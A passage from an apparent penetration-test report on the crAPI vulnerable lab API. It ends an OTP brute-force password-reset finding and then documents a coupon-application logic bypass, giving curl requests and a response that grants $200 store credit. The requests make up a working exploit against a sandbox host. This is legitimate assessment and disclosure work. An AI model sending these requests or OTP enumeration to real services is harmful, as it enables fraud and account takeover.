The v2 endpoint allows unlimited OTP enumeration, making it possible to systematically test all 1,000,000 possible OTP combinations (000000-999999) to reset any user's password.

---

AUTHZ-VULN-14: Coupon Application Workflow Bypass

Summary:

• Vulnerable location: POST /workshop/api/shop/apply_coupon
• Overview: Business logic bypass allowing coupon application without proper shopping cart state
• Impact: Ability to accumulate unlimited store credit without purchasing items
• Severity: High

Prerequisites: Valid JWT Bearer token, valid coupon code

Exploitation Steps:

1. Create a test coupon:

   curl -X POST "https://crapi.sandbox.local:8888/community/api/v2/coupon/new-coupon" \
     -H "Content-Type: application/json" \
     -H "Authorization: Bearer [USER_TOKEN]" \
     -d '{
       "amount": "20",
       "coupon_code": "TESTCOUPON20"
     }'
   

2. Apply coupon without shopping cart workflow:

   curl -X POST "https://crapi.sandbox.local:8888/workshop/api/shop/apply_coupon" \
     -H "Content-Type: application/json" \
     -H "Authorization: Bearer [USER_TOKEN]" \
     -d '{
       "coupon_code": "TESTCOUPON20",
       "amount": 100
     }'
   

Proof of Impact: Successfully bypassed normal shopping workflow and accumulated credit:

{"credit":200.0,"message":"Coupon successfully applied!"}

The application granted $200.00 in store credit without requiring any items in cart or following the proper shopping workflow. This allows attackers to accumulate unlimited store credit by repeatedly applying coupons without purchasing any products.